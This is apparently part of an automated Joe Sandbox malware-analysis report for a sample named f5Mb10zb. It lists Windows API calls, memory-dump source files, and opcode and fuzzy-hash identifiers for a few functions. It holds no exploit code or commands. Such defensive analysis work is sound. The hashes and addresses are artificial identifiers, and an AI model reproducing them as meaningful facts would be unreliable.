                                                                                    • Instruction Fuzzy Hash: 5CD02E72508330BACA103324AC0ECAF39058B22332FA04B29F43D642F2CA6D0DD162A6
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0072DA55,?), ref: 0072E2A3
                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0072DA55,?), ref: 0072E2B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: RTL
                                                                                    • API String ID: 3537982541-834975271
                                                                                    • Opcode ID: 96f76ebb34acafb5de1eea9ada4911ab1451ba888fea626aa53005261f6fa7a5
                                                                                    • Instruction ID: f24c956be31c2b16c2c4696e12303af4db430bed32cfcfd2d5130dfe37c61b62
                                                                                    • Opcode Fuzzy Hash: 96f76ebb34acafb5de1eea9ada4911ab1451ba888fea626aa53005261f6fa7a5
                                                                                    • Instruction Fuzzy Hash: 56C0123124071066F63057757C0DBC7AA599B00B92F05444CB585E91E1D6EDC54486E0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E467
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: ps$zs
                                                                                    • API String ID: 1269201914-2747536401
                                                                                    • Opcode ID: 8daf7e19e9692e087354920e21b1c05544c862a07d543d25323f8778de25f784
                                                                                    • Instruction ID: cef22403aebc703913f984fcfb3ec82691d1fbc6288f62bc3bd165665b678059
                                                                                    • Opcode Fuzzy Hash: 8daf7e19e9692e087354920e21b1c05544c862a07d543d25323f8778de25f784
                                                                                    • Instruction Fuzzy Hash: 93B012C1699280FC3104A1181D06D77010DC0C4F51B30903EFC04C00C3D88C4D040533
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E467
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Us$zs
                                                                                    • API String ID: 1269201914-1410283396
                                                                                    • Opcode ID: 363c4d5bce0990b50d9777ccdbfc480d79e8e83cdc88ac42f66277039f47b5ba
                                                                                    • Instruction ID: 348bd8c305deb2a2cf2fc514d57cf9018f198e80382013b99427d1c61694988a
                                                                                    • Opcode Fuzzy Hash: 363c4d5bce0990b50d9777ccdbfc480d79e8e83cdc88ac42f66277039f47b5ba
                                                                                    • Instruction Fuzzy Hash: 50B012D1698240FC310421141D06C77020DC0C0F15B30D03EFE00D40C3D88D0F050433